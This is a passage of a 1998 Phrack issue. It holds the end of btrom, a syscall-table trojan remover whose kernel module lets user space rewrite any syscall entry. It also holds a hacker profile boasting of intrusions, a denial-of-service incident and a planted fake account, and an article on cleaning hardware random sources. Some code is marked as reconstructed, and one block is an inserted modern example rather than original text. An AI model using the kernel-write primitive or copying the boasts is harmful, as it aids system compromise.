            if( nombre[0]!=0 ) {
                if( sm && sm_busca_x_nombre(&address,nombre)) {
                    if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) {
                        dif_n_s++;
                        printf("%8x!%8x %3i [%c] %s\n",retval,address,i,c,nombre);
                    } else
                        printf("%8x %8x %3i [%c] %s\n",retval,address,i,c,nombre);
                } else
                    printf("%8x          %3i [%c] %s\n",retval,i,c,nombre);
            } else
                printf("%8x          %3i [%c]\n",retval,i,c);
            old_clean = clean;
        }
    }
    return clean;
}

/******************************************************************
 * segunda_recorrida: clean trojans
 ******************************************************************/
int segunda_recorrida(int j)
{
    char nombre[50],dire[50];
    unsigned int address;
    int i,old_clean,clean,key;
    unsigned int retval;
    char c;
    unsigned int k;

    old_clean=clean=0;
    printf( "\n2nd part: Clean Trojans\n"
            "   s = System.map address\n"
            "   c = clean address\n"
            "   m = manual address\n"
            "   i = ignore\n"
            "   now     System.map Num [ ] Syscall Name\n"
            "---------------------------------------\n");
    for( i=0; i< NR_syscalls ; i++ ){
        __asm__ volatile ( "int $0x80"
                           : "=a" (retval)
                           : "0"(j), "b"((long)(i)), "c"((long)(0)), "d"((long)(0)) );
        clean = comun_1er_2da(j,i,nombre,&c,clean,retval);
        if( clean > old_clean ) {
            address = 0;                /* bug fix: 's' with no System.map match */
            if( nombre[0]!=0 ) {
                if( sm && sm_busca_x_nombre(&address,nombre)) {
                    if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) {
                        dif_n_s++;
                        printf("%8x!%8x %3i [%c] %s ?",retval,address,i,c,nombre);
                    } else
                        printf("%8x %8x %3i [%c] %s ?",retval,address,i,c,nombre);
                } else
                    printf("%8x          %3i [%c] %s ?",retval,i,c,nombre);
            } else
                printf("%8x          %3i [%c] ?",retval,i,c);
            old_clean = clean;
            fseek(stdin,0L,SEEK_END);
            key=fgetc(stdin);
            switch(key) {
                case 's': k = address ? address : 1; break; /* no address: ignore */
                case 'c': k = SYS_NULL; break;
                case 'm': printf("Enter a hex address (ex: 001a1b):");
                          fseek(stdin,0L,SEEK_END);
                          fgets( dire,50,stdin );
                          k = strtoul(dire,(char **)NULL,16);
                          break;
                default:  k=1; break;
            }
            /* FIXME: 1 cannot be used as an address */
            if(k!=1)
                /* mbtrom mode 1: sys_call_table[i] = k */
                __asm__ volatile ( "int $0x80"
                                   : "=a" (retval)
                                   : "0"(j), "b"((long)(i)), "c"((long)(1)), "d"((long)(k)) );
        }
    }
    return clean;
}

void help()
{
    printf( "\nUsage: btrom nr_of_mbtrom [-c][-v]\n"
            "\t1) Install the module mbtrom with `insmod mbtrom'\n"
            "\t2) The module must return a value. If not see the README->bugs\n"
            "\t   btrom value_returned_by_mbtrom [-c][-v]\n"
            "\t   `v' is verbose. Recommended\n"
            "\t   `c' is clean. Cleans the trojans\n"
            "\t3) Uninstall the module mbtrom with `rmmod mbtrom'\n"
            "\n"
            "\tExamples:\n"
            "\t   btrom 215 -cv\n"
            "\t   btrom 214 -v\n"
            "\t   btrom 215\n"
            "\nWarning: Don't put random numbers. Be careful with that!"
            "\nRecommended: Do `btrom _number_ -v' before a cleaning\n\n" );
    exit(-1);
}

void chequear_argumentos( char *parametros )
{
    int i,j;

    i=strlen(parametros);
    if(parametros[0]!='-') help();
    /* The body of this loop and the opening of main() were lost where this
     * file was reproduced (everything between a `<' and the next `>' is
     * missing); they are reconstructed from the options documented in help(). */
    for(j=1;j<i;j++) {
        switch(parametros[j]) {
            case 'v': quiet = 0; break;         /* verbose */
            case 'c': borrar = 1; break;        /* clean */
            default:  help();
        }
    }
}

int main( int argc, char **argv )
{
    int i,clean;
    unsigned int retval;

    if( argc<2 || argc>3 ) help();
    quiet = 1;
    borrar = 0 ;
    if( argc==3) chequear_argumentos(argv[2]);

    au = au_open();
    sm = sm_open();
    if(!au && !quiet)
        printf("Error while opening `asm/unistd.h' in `"ASM_UNISTD"'\n");
    if(!sm && !quiet)
        printf("Error while opening `System.map' in `"SYSTEM_MAP"'\n");
    dif_n_s=0;

    /* __NR_mbtrom number */
    i = atoi( argv[1] );
    if(!i) help();

    /* Check whether it is a BIG_KERNEL or not: mbtrom mode 2 returns the
     * address of sys_call_table */
    __asm__ volatile ( "int $0x80"
                       : "=a" (retval)
                       : "0"(i), "b"((long)(0)), "c"((long)(2)), "d"((long)(0)) );
    big_kernel =(retval>BIG_KERNEL?BIG_KERNEL:SMALL_KERNEL);

    /* First pass */
    clean = primer_recorrida( i );

    /* Message from senior btrom */
    printf( "\nb t r o m   s a y s:\n");
    if(dif_n_s>0) {
        printf( "Your System.map seems to have a problem.\n");
        /* The original text is cut off at this comparison; the rest of main()
         * is a minimal reconstruction so that the file is complete. */
        if(dif_n_s < SYSMAP_LIMIT)
            printf( "(%i differences; usually not a System.map problem)\n",
                    dif_n_s);
        else
            printf( "(%i differences; check that it is the right System.map)\n",
                    dif_n_s);
    }
    printf( "%i suspicious entries.\n", clean);

    /* Second pass, only with `-c' */
    if(borrar)
        segunda_recorrida( i );

    if(au) fclose(au);
    if(sm) fclose(sm);
    return 0;
}
<-->
<++> linenoise/btrom/config.h
/* config.h used by btrom.c and mbtrom.c */
/* Modify to taste */

/* Number that one assumes is empty in the sys_call_table */
#define NUMERO_VACIO 215

/* Path to the System.map file */
/* If you never compiled the kernel it may be /boot/System.map */
/* FIXME: use the define from the Makefile so this isn't defined in 2 places */
#ifndef SYSTEM_MAP
#define SYSTEM_MAP "/usr/src/linux/System.map"
#endif

/* There are problems between old and new. Generally it is not a problem
   of the System.map */
#define SYSMAP_LIMIT 8

/* Path to the asm/unistd.h file */
#define ASM_UNISTD "/usr/include/asm/unistd.h"

/* Prefix to search for in asm/unistd.h */
#define AU_PREFIX "#define*__NR_*"

/* How far kernel space reaches */
/* FIXME: I don't know what the real limit is. It works with this anyway :-) */
#define LIMITE_SYSCALL 0x00300000

/* Do not modify */
/* btrom version */
#define VERSION "0.3"

/* BIG_KERNEL and SMALL_KERNEL */
#define BIG_KERNEL   0xc0000000
#define SMALL_KERNEL 0x00100000
<-->
<++> linenoise/btrom/mbtrom.c
/*
 * btrom module - Borra Trojanos Modulo (module trojan remover)
 * 25/11/98 - by Riq
 *
 * compile with:
 *    gcc -c -O3 -fomit-frame-pointer mbtrom.c
 */

#define MODULE
#define __KERNEL__
/* The kernel header names were lost where this file was reproduced; these
 * are the ones a 2.0/2.2 module needs for printk and the module entry
 * points. */
#include <linux/config.h>
#ifdef MODULE
#include <linux/module.h>
#include <linux/version.h>
#else
#define MOD_INC_USE_COUNT
#define MOD_DEC_USE_COUNT
#endif
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/types.h>
#include <asm/unistd.h>
#include "config.h"
#include "sys_null.h"

extern void *sys_call_table[];
int __NR_mbtrom;

/* The system call installed by the module:
 *   mode 0: return sys_call_table[numero]
 *   mode 1: sys_call_table[numero] = address
 *   mode 2: return the address of sys_call_table (BIG_KERNEL detection) */
void *funcion( int numero, int modo, unsigned int *address )
{
    switch(modo){
        case 0:
            return sys_call_table[numero];
        case 2:
            return (void *)&sys_call_table;
        case 1:
        default:
            sys_call_table[numero]=address;
            break;
    }
    return (void *)0;
}

int init_module(void)
{
    __NR_mbtrom = NUMERO_VACIO ;

    /* Look for an empty entry from NUMERO_VACIO down to 0 */
    while ( __NR_mbtrom!= 0 && sys_call_table[__NR_mbtrom] != 0 &&
            sys_call_table[__NR_mbtrom] != (void *)SYS_NULL )
        __NR_mbtrom--;

    if(!__NR_mbtrom ) {                 /* reached 0: give up */
        printk("mbtrom: Oh no\n");
        return 1;
    }

    sys_call_table[__NR_mbtrom] = (void *) funcion;

    if( __NR_mbtrom != NUMERO_VACIO )
        printk("mbtrom: Mmm...\n");
    printk("mbtrom: -> %i <-\n",__NR_mbtrom);
    return 0;
}

void cleanup_module(void)
{
    sys_call_table[__NR_mbtrom] = 0;
    printk("mbtrom: Bye.\n");
}
<-->
<++> linenoise/btrom/sys_null.awk
/sys_ni_syscall/ { print "#define SYS_NULL 0x"$1 }
<-->

0x6>-----------------------------------------------------------------------

----[ PDM

Phrack Doughnut Movie (PDM) last issue was `Miller's Crossing`.

PDM53 recipients: None of you suckers. Go rent it. It's well worth your time.

PDM54 Challenge: "I have John Murdock... In mind..."

0x7>-----------------------------------------------------------------------

----[ Super Elite People That REad Phrack (SEPTREP)

New additions: Ron Rivest, W. Richard Stevens

Why they are SEP: One is the `R` in RSA. The other writes TCP/IP bibles.

----[ Current List

W. Richard Stevens
Ron Rivest

-----------------------------------------------------------------------------

----[ EOF

----[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 04 of 12

-------------------------[  P H R A C K   5 4   P R O P H I L E

-----------------[  Personal

Handle: ParMaster
Call him: Ishmael? SHALL WE PLAY A GAME?
Reach him: Through the grapevine
Past handles: Trouble Verify, Immediate Lee, Bad Karma, Thoth, Optomystic,
              (The) Omicron
Handle origin: (Quote from Underground page #104) "Par had got his full name
    -The Parmaster- in his earliest hacking days. Back then, he belonged to a
    group of teenagers involved in breaking the copy protections on software
    programs for Apple IIe's, particularly games. Par had a special gift for
    working out the copy protection parameters, which was a first step in
    bypassing the manufacturers' protection schemes. The ringleader [sc0tch]
    of the group [Jedi Hackers] began calling him 'the master of parameters'
    -The ParMaster- Par, for short. As he moved into serious hacking and
    developed his expertise in X.25 networks, he kept the name because it
    fitted nicely in his new environment.
    'Par' was a common command on an X.25 pad, the modem gateway to an X.25
    network."

Date of birth: NOT January 15th!
Age at current date: 27
Height: 5'11"
Weight: 202 lbs
Eye color: Brown
Hair color: Brown (Blonde highlights)
Computers: Dell 320n 386 laptop, Walkabout vt100 terminal with built-in 2400
           baud modem.
Sysop/Co-Sysop of: DarkF0RCE
Admin of: [Withheld]
URLs: http://altavista.digital.com - search - "parmaster" - submit - read.

----------------[  Favorite things

Women: Blondes with blue / green eyes. Chicks in skimpy clothes with accents.
Cars: Ferrari and Porsche clubs :-), anything with a jet engine on it.
Foods: Chinese, got to have my chinese food. Calamari, Duck, Quail, most
       seafood.
Alcohol: Now, we're talkin'. Jim Beam, Jack Daniels, Crown Royal, Jose Cuervo /
         Dos Realis, and last but certainly not least Finlandia!
Music: The The, The Dickies, Underworld, Kraftwerk, Chemical Brothers, Crystal
       Method, El Dubarge, CCCP.
Movies: They Live, A fish called wanda, 13 Monkees, Little Trouble in Big
        China, 5th Elemental, True Lies, Killer Klowns from Outer Space,
        Eraser, Under Siege, Tetsuo Ironman, WarGames, and Sneakers.
Authors: Immanuel Velikovsky, Piers Anthony, Terry Brooks, James Gardner,
         J.R.R. Tolkien and please forgive me for anyone i'm missing.
Turn Ons: Traveling in my mind with someone i love.
Turn Offs: Pain, agony, hurting and torture.

----------------[  Passions

I enjoy scrying the future and doing the great work. This is a very difficult
thing to describe in itself. Some of you who know me well enough can see it
every once in a while. I'm no artist, but i attempt to do it and sometimes it
expresses itself in artistic ways. I love hanging out with my friends,
sometimes i need to be alone, but time i spend with my friends is always
special.

----------------[  Memorable experiences

When the US Secret Service raided me in 1991 and took all my stuff (the 3rd
time) including the credit reports of the President (iffie) and Vice President
(definitely) of the United States of America. I was in jail in New York
waiting for transport, and was never really threatened or hurt, except once
and it was a major incident for me but i don't think it was influenced by
anyone.

When i did an interview for Coast Weekly Magazine in Monterey County in 1993,
after this issue came out things really fell apart for me, people started
being really mean and really dangerous people started doing really harmful
things around me. This article was my one 'play article'. I mentioned a lot of
stuff that was currently going on, including the Clinton Administration's use
and promotion of the new Clipper Chip device. I wonder why the guys who did a
play article for the San Jose Mercury News didn't receive the same treatment.
My relatives always told me life isn't fair, until this time i had plenty of
reasons to believe that but never did. Incidents following this made me really
question how the United States was changing. It especially made me question
who is running the world nowadays and who they made a decision to hire under
them to work in various agencies. Everything just seemed to have more style
before. However, there are also a lot of cool things with style brought about
by this, which may be worth the hardships in their value.

Using sprite to send an out of bounds packet to port 139 of trv-psitech.com,
the server was down for a little bit, a day or two. The error it responded
with, "Parameter not found".

Creating IRAQ-DEFENSE password PARMASTERG0TTHEM! on tymnet while i was "in".
I'm not sure what effect this had during the time i had set it up during
Operation Desert Shield. I put it out into the computer underground globally
promoting it as an iraqi system i had found. What effect this may have had
during that time i still do not know. Logically all i can assume is that it
managed to put a lot of hackers who tried it, in one place at the time when
they connected to it. As well as promote and possibly move them toward being
aware of any enemy computers they may have hacked. Indeed, on the boards i was
confronted about it... Specifically by Crimson Death who stated in the posts
that it was, in fact, not an iraqi system at all. Interestingly enough in
following posts people responded *WITH* actual network addresses and hosts of
iraqi systems. Too bad at the time all communications were cut. Most
certainly, their access to the outside world's computers was at least
partially if not totally through Bahrain. Every once in a while i would
periodically check on tymnet's bahrain gateway and monitor traffic there. For
those of you who wonder why i did this, i don't know... I can honestly say I
wasn't in conscious control of what i was doing. I have some theories about
why, some include a higher power others include some pretty crazy stuff like
mind control. I'm leaning somewhat towards the latter because i had some
severe memory problems. I could not remember anything about this until I was
on a phone interview with Joshua Quittner for the Masters of Deception book,
why at that time I recalled it i do not know. I do know that prior to this
time in searching through my memory fervently that I had not previously at any
other time after 1990 thought about or recollected my actions then. The only
thing i remembered was creating ParMasterX75 nui Password par=tymnet gawd! and
that was because the account I had used to make IRAQ-DEFENSE had mysteriously
changed its properties and now was connected to place calls on the global data
network. Prior to that it had only been able to connect to the select hosts of
the WEFA group, its rightful owner. I only became aware of this because of
Corrupt [MOD] pointing out that I should list out what accounts were active.
I then saw that he had created an account which could be used to place data
calls. John apparently did not know that the properties of the account's
access had changed and that it did not have access to do things like that
before, if he did he was not offering that knowledge, or even better he may
have changed it :-).

Disneyland.

----------------[  Boards to mention

The board that Mr. Zod set up on the 202 sprintnet system owned by AFOSI and
used to train them on how to catch computer hackers *GUFFAW*, my I wonder if
they ever found out? Weren't we why they called it that? ROFLMFAO

DarkF0RCE, I wonder whatever happened to Derek.. One Man Army.. Hmm, like
people are posting these PC Pursuit codes on our board, i wonder where they
came from? Phear P0STMASTER's ACOS skills. ROFLMFAO

Pegasus, this BBS run on a VAX in switzerland ended up turning out to be part
of a sting operation involving law enforcement in europe.... Why do all these
k-k00l codes still work tho?

Unphamiliar Territories, invalid media's board. Managed to collect together
quite a few people with talent as well as some really stupid asshole narks.
Can anyone say PMF?

Bullet, wherever it is... There you are.

BlackNET, so much has been said about this one in circles its not funny. No
one knows where it is or how to connect to it? I wonder why... I'm confused.

Fuck QSD Channel.

Sectec, this board was always an old stand-by for me when the internet was
taking off.. Now boards with discussions on packet switched nets like it
aren't around. Or, if they are they are hidden and not openly promoting
themselves. Most likely, they are somewhere on the internet... It's probably
just me... but i don't trust the internet... at all.

ALTGER, altos computer systems munich.... i know far too many people from this
board in real life now. 12 years ago I never would have thought that this
would occur or feasibly see how this would happen. It's still mind-boggling to
me. Old skool Apple warez crew: Blue Adept [213], Ubiquitous Hacker,
Hollywood, Vampire, Pirette. Others: Piper, Dr. Who, Shatter, Theorem, Nora,
and Nasa Pilot.

ALTHH, altos computer systems hamburg (later Markt and Technic... tchh), same
as altger but I spent MUCH MUCH more time here. I think this is where I got
the magic. THE crew: Floyd, TTM, Necrovore-Skyhook-backlash-LineShadow-
TouchTone [Xtension], jumpingjackflash, Lutz Pelikan, camelot, pad-gandalf-
fusion-power-etc [8LGM], Force-Phoenix-Nom-etc [The Realm], anthrax, there
are too many people to list here forgive me if I left you out. You know who
you are.

The Phoenix Project, what a cool place, where else could I tease Sandy
Sandquist about FTS.

Illuminati BBS, my account was short lived and i logged in maybe twice. But
where else could i see the latest on AD&D games with, The Mentor, Erik
Bloodaxe, etc.

The initial r00t homepage, boy was this a funny joke. Wait, i'm at a con and
now its all real and there's like 40 people here. These people are smart and
make lots of money. Hosaka and T3... You could not have known it would turn
into this. r00t people who kick ass: Number one for all time - glyph a.k.a
necrovore, alhambra, oghost, redragon [tacobell.com], and daemon9.

Ripco, well I wasn't on here a lot but it played such an important part in the
computer underground over the years i have to at least mention it. It must
have also been my first exposure to l0ck. Tons of other people here, this
place kept lots of Text files circulating in the underground that might have
otherwise been lost.

----------------[  Quotes

  "I didn't mean for your daddy to spooge all over the minnie mouse pillow on
  your bed, it wasn't my fault, i told him he could cum in my ass"
    -- Vamprella

  "No."
    -- Agent Steal

  "Remember when i did that class change for you?"
    -- U4EA

  "How did you know i was gonna say that about butter?"
    -- Nirva

  "I got approval from Uli to start Chaos Computer Club West, want to be in
  it?"
    -- Doc Holiday

  "Bilbo Baggins, how are youuuuuu"
    -- Torquemada

----------------[  The future of the computer underground

The future? Hmm. Am I the guy to ask? Maybe. Things have changed a lot, the
only thing constant is change. It seems there is less chivalry nowadays. The
government and corporations painted a picture of us. That picture is not a
pretty one. They even have a general psychiatric profile we are all supposed
to fall into. Movies, like "Hackers" portray us a certain way also. Kids just
starting out, see this and immediately it becomes the way the underground is.
The Masters of Deception also promoted this image of the Computer Underground.
We end up fighting ourselves more than working together to accomplish goals. I
remember a time when things weren't like that. There was very little
confrontation between hackers, and information flowed freely. If you ask me,
it's all a big conspiracy :-). A big conspiracy to keep hackers separated and
fighting among themselves. People like to talk to me about the good old days.
That's all well and good, but those days are over. There can still be another
golden age in the Computer Underground. The only thing stopping it, is you.

----[  EOF

---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 05 of 12

-------------------------[  Linux and Random Source Bleaching

--------[  Phunda Menta

----[  Introduction

Random numbers are often used in cryptography, but good random bits can be
hard to come by. Linux has two useful pseudo-devices called /dev/random and
/dev/urandom. Catting /dev/random yields a small pool of random bits obtained
from internal system state. If you cat this output to your terminal and bang
on some keys, you'll notice that you get more random bits. Disk drive
accesses, IRQ timings, and key presses: all of this gets hashed into a small
pool of entropy that can be read directly from /dev/random. /dev/urandom is a
stream that hashes /dev/random and gives you that hash value; it then hashes
the last hash together with the pool, forever. Both give a decent source of
random bits. By default, /dev/urandom uses SHA (I know the source comments
claim MD5, but if you look at the code, it is SHA). So /dev/urandom is a
decent source of pseudo-random bits. /dev/random is better, but it is of
limited size. These are very useful, but what we really want is a hardware
source of random bits.

----[  The Hardware Solution

Most computers have sound cards these days, and a sound card is a great source
of potential entropy. Unplug the microphone from your sound card and cat
/dev/audio to a file. Sample maybe 200 or 300k of data. Now play it back; if
it sounds like static, you can skip ahead to cleaning up the source. You can
also try plugging a 1/8" jack (or whatever you use for input) that has
dead-end leads into the mic port. Try both of these methods and find one that
gives a clean static hiss.

Chances are that on playback all you have is silence, but we want static.
Static is random, and randomness is our goal here, so grab an FM radio and
tune it to the high end, around 106 or 107 MHz. Find a frequency that gives a
good clean hiss; an analog tuner is best for this. If you have a digital tuner
and can't get the precision needed to tune in a good static source, get the
best static you can, but you might have a harder time cleaning up this source.

If your signal has a high-pitched tone present, you can clean this out in a
few different ways. The easiest is to use software to strip out that
frequency. There is a family of programs for Linux that can help with this
(Bio, Mammut, and Ceres). These programs allow very good visualization of the
signal and they also allow you to pull the signal apart and isolate different
frequencies. Chances are you will have a bunch of junk in the 60 Hz region,
probably due to EMI (electro-magnetic interference) from power supplies, along
with whatever is giving you that tone. In either case you should shield your
FM receiver and the audio cable to avoid EMI. You may be able to shield your
sound card, but I am skeptical of the worth of this. A lot of electronics
supply houses sell shielding wrap and preshielded cables. You can also try
aluminum foil. I haven't had much luck with aluminum foil, but some people
swear by it.

Once you have your source set up, jack it into your sound card and sample it
at 44 kHz. Run the results through the Diehard testing package (a battery of
tests to evaluate the strength of random number generators). Your source won't
pass the tests. Clean up your source bytes however you need to. Strip out any
60 Hz junk with Mammut by using the Transform|Filter options; you can then use
the Transform|Phase Shift option to slide the wave form back into place so
that there is no gap at 60 Hz. If your static source has a small amplitude,
crank it up by increasing the hardware gain, or use Mammut to change the
derivative or the effective gain, whichever you like. I have found no
empirical evidence to suggest that one way works better than the others, but,
theoretically, changing the slope may be a Bad Thing (tm). You may also want
to use the Phase Shift and Threshold options to chop up your signal. You can
resynthesize the parts and save them back out. Listening to these parts, and
graphing them, can help give you an idea of what other things your source
signal is doing. If push comes to shove, and you can't weed out all of the
bias, or if you need a more hands-free way to clean up the source (and don't
have the time or skill to write custom filters), you can just use a
cryptographic hash.

After you clean up your source, take a look at it with Ceres or Bio. If the
output looks like video static with no noticeable patterns or hot/cold areas,
then you have sufficiently cleaned up the signal, and you can move on to
bleaching the static for use as a random number stream. As a side note, if you
ever want to see what a good random distribution is supposed to look like, you
can also use output from /dev/urandom. Use sox (stock with Redhat distros) to
convert the output stream of /dev/urandom (use a type of 'ul') to AIFF for
Mammut, or Ceres, or whatever. The distribution given by /dev/urandom is
statistically random, so it will tell us what to look for, but /dev/urandom
(SHA, basically) is still pseudo-random, since complete knowledge of the
previous inputs allows us to calculate all future outputs. This is not so with
static.

----[  Bleaching the data stream

The static coming out of your FM source is skewed white noise. We need to
clean it up, so we bleach it. RFC1750 gives a slew of methods to clean up your
source. One of the simplest effective methods of whitening a source is to XOR
all the bits in a byte together, yielding one output bit. These bits are then
reassembled into bytes and output. This method has a few advantages. The first
big advantage is that you know precisely how many bytes you need to sample in
order to obtain a certain number of output bytes. XORing is also fast, and
easy to implement.

Another method of deskewing data is attributed to John von Neumann in RFC1750.
This method is called transition mapping. Transition mapping is a relatively
simple process. We take two bits from our input. If this bit sequence is 01 or
10 we output a 0 or a 1, respectively. The sequences 00 and 11 are discarded.
This method completely deskews a stream of data at the expense of needing an
unknown number of input bits. Transition mapping is also a very fast process,
and on a lightly skewed input transition mapping can yield more output bits
than XOR.
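The two deskewing methods just described, plus the XOR-of-both combination the article goes on to recommend for correlated sources, as an added example written for this page (it is not the author's bleach code). Its input is a constructed xorshift32 stream with two bytes ORed together, a stand-in for the sampled static that is biased toward one bits; the ones fraction measured at each stage shows the bias disappearing.

```c
#include <stdio.h>
#define SRC_LEN 4096  /* bytes of constructed skewed input */

/* XOR distillation (RFC 1750): XOR the eight bits of each input byte into
 * one output bit, so eight input bytes give exactly one output byte. */
size_t xor_distill(const unsigned char *in, size_t inlen, unsigned char *out)
{
    size_t outlen = 0;
    unsigned char acc = 0;
    int nbits = 0;
    for (size_t i = 0; i < inlen; i++) {
        unsigned char p = in[i];
        p ^= p >> 4; p ^= p >> 2; p ^= p >> 1;          /* p & 1 = parity */
        acc = (unsigned char)((acc << 1) | (p & 1));
        if (++nbits == 8) { out[outlen++] = acc; acc = 0; nbits = 0; }
    }
    return outlen;                        /* inlen / 8, remainder dropped */
}

/* Von Neumann transition mapping: read input bit pairs; 01 -> 0, 10 -> 1,
 * 00 and 11 are discarded, so the output length depends on the data. */
size_t transmap(const unsigned char *in, size_t inlen,
                unsigned char *out, size_t outcap)
{
    size_t outlen = 0;
    unsigned char acc = 0;
    int nbits = 0;
    for (size_t i = 0; i < inlen && outlen < outcap; i++) {
        for (int shift = 6; shift >= 0 && outlen < outcap; shift -= 2) {
            int pair = (in[i] >> shift) & 3;
            if (pair == 0 || pair == 3) continue;              /* discard */
            acc = (unsigned char)((acc << 1) | (pair == 2)); /* 10 -> 1 */
            if (++nbits == 8) { out[outlen++] = acc; acc = 0; nbits = 0; }
        }
    }
    return outlen;
}

/* The remedy for correlated sources: XOR the XOR-distilled stream with the
 * transition-mapped stream byte for byte (length of the shorter one). */
size_t combine_streams(const unsigned char *a, size_t alen,
                       const unsigned char *b, size_t blen, unsigned char *out)
{
    size_t n = alen < blen ? alen : blen;
    for (size_t i = 0; i < n; i++) out[i] = a[i] ^ b[i];
    return n;
}

/* Fraction of one bits in a buffer; 0.5 means no bias. */
double ones_fraction(const unsigned char *buf, size_t len)
{
    size_t ones = 0;
    for (size_t i = 0; i < len; i++)
        for (int b = 0; b < 8; b++) ones += (buf[i] >> b) & 1;
    return len ? (double)ones / (8.0 * len) : 0.0;
}

/* Constructed stand-in for the sampled FM static: a deterministic xorshift32
 * stream, two bytes ORed together so every bit is 1 about 75% of the time. */
static unsigned int xs_state;
static unsigned char xs_byte(void)
{
    xs_state ^= xs_state << 13; xs_state ^= xs_state >> 17; xs_state ^= xs_state << 5;
    return (unsigned char)(xs_state >> 24);
}
void make_skewed(unsigned char *buf, size_t len)
{
    xs_state = 0x9E3779B9u;               /* fixed seed: reproducible runs */
    for (size_t i = 0; i < len; i++) buf[i] = xs_byte() | xs_byte();
}

/* Run the whole pipeline and report on one stage: which = 0 skewed input,
 * 1 XOR distillation, 2 transition mapping, 3 combined. Returns the ones
 * fraction of that stage and, via len_out, its length in bytes. */
double run_pipeline(int which, size_t *len_out)
{
    static unsigned char src[SRC_LEN], x[SRC_LEN / 8], t[SRC_LEN], c[SRC_LEN];
    make_skewed(src, SRC_LEN);
    size_t xl = xor_distill(src, SRC_LEN, x);
    size_t tl = transmap(src, SRC_LEN, t, sizeof t);
    size_t cl = combine_streams(x, xl, t, tl, c);
    const unsigned char *s = which == 0 ? src : which == 1 ? x : which == 2 ? t : c;
    size_t l = which == 0 ? SRC_LEN : which == 1 ? xl : which == 2 ? tl : cl;
    if (len_out) *len_out = l;
    return ones_fraction(s, l);
}
size_t pipeline_len(int which) { size_t l = 0; run_pipeline(which, &l); return l; }

int main(void)
{
    const char *name[] = { "skewed input", "xor distill", "transition map", "combined" };
    for (int w = 0; w < 4; w++) {
        size_t l;
        double f = run_pipeline(w, &l);
        printf("%-15s %5zu bytes, ones fraction %.3f\n", name[w], l, f);
    }
    return 0;
}
```

Transition mapping only fully deskews when the two bits of each pair are independent, which is why the ones fraction, not this test alone, should be backed by Diehard on a real source.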
Both XOR and transition mapping are fast processes that are good enough to
deskew a set of bits such that they will pass the Diehard suite of tests, if
the input is suitably clean and random. If the input is somehow correlated,
you will have a harder time getting it to pass Diehard. I have found that
correlated sources can be cleaned up by XORing the output of an XOR
distillation with the output of a transition-mapped distillation.

Slower constructions can be built out of cryptographic hash functions, but
may be trusted more by the paranoid. Hash functions are also recommended if an
attacker has the means to somehow affect your random source. If you are
worried about this attack, a good way to address it is to appeal to
/dev/random: use a block cipher such as 3DES to encrypt your random source
with a key and initialization vector obtained from /dev/random. If an attacker
can bias your source in a predictable way, he still has no idea what bytes you
may be using for your actual random numbers. Skew that the attack may
introduce into your hardware can first be cleaned with a process like
transition mapping and then pumped through a looped hash function or a block
cipher. The output of a (decent) hash function or block cipher will pass the
Diehard tests.

In a heavily used machine, where the entropy pool used by /dev/random is
updated frequently, the output from the above processes can be XORed byte for
byte with the stream from /dev/urandom. This is a simple method to mix the
streams together for added security. Another method would be to hash N/2 bytes
from /dev/urandom and N/2 bytes from your source together, where N is the
number of bytes that your hash function will yield.

All of these methods are suitable to deskew a data set, but they should not be
used blindly. Before putting the resulting bits to use, examine several samples
with Diehard and with graphic or spectral tests. I have included code to do
XOR and transition mapping, along with hashing mechanisms.
I have plenty of code to do other hash and block cipher based stuff too, but I
did not include that here because the code is not self-contained (it needs
some crypto libs). If you want to contact me about the code or if you have
some comments or suggestions, I can be reached at phundie@usa.net.

----[  References and Related stuff:

RFC1750 Randomness Recommendations for Security
  http://www.kobira.co.jp/document/rfc/RFC1750.txt

Diehard Test Suite
  http://stat.fsu.edu/~geo/diehard.html

Pseudo-Random Number Conditioning
  http://www.clark.net/pub/cme/html/ranno.html

Linux MIDI & Sound Applications (has links to Mammut, Bio and Ceres)
  http://www.bright.net/~dlphilp/linux_soundapps.html

----[  The code

<++> bleach/Makefile
all:
	gcc -w -c md5/md5.c
	gcc -c sha/shs.c
	gcc -o sha_distill sha_distill.c shs.o
	gcc -o md5_distill md5_distill.c md5.o
	gcc -o xor_distill xor_distill.c
	gcc -o transmap transmap.c
<-->
<++> bleach/md5/md5.c
/*
 ***********************************************************************
 ** md5.c -- the source code for MD5 routines                         **
 ** RSA Data Security, Inc. MD5 Message-Digest Algorithm              **
 ** Created: 2/17/90 RLR                                              **
 ** Revised: 1/91 SRD,AJ,BSK,JT Reference C ver., 7/10 constant corr. **
 ***********************************************************************
 */

/*
 ***********************************************************************
 ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved.  **
 **                                                                   **
 ** License to copy and use this software is granted provided that   **
 ** it is identified as the "RSA Data Security, Inc. MD5 Message-    **
 ** Digest Algorithm" in all material mentioning or referencing this **
 ** software or this function.                                       **
 **                                                                   **
 ** License is also granted to make and use derivative works         **
 ** provided that such works are identified as "derived from the RSA **
 ** Data Security, Inc. MD5 Message-Digest Algorithm" in all         **
 ** material mentioning or referencing the derived work.             **
 **                                                                   **
 ** RSA Data Security, Inc. makes no representations concerning      **
 ** either the merchantability of this software or the suitability   **
 ** of this software for any particular purpose. It is provided "as  **
 ** is" without express or implied warranty of any kind.             **
 **                                                                   **
 ** These notices must be retained in any copies of any part of this **
 ** documentation and/or software.                                   **
 ***********************************************************************
 */

#include "md5.h"

/*
 ***********************************************************************
 ** Message-digest routines:                                          **
 ** To form the message digest for a message M                        **
 **  (1) Initialize a context buffer mdContext using MD5Init          **
 **  (2) Call MD5Update on mdContext and M                            **
 **  (3) Call MD5Final on mdContext                                   **
 ** The message digest is now in mdContext->digest[0...15]            **
 ***********************************************************************
 */

/* forward declaration */
static void Transform ();

static unsigned char PADDING[64] = {
  0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

/* F, G, H and I are basic MD5 functions */
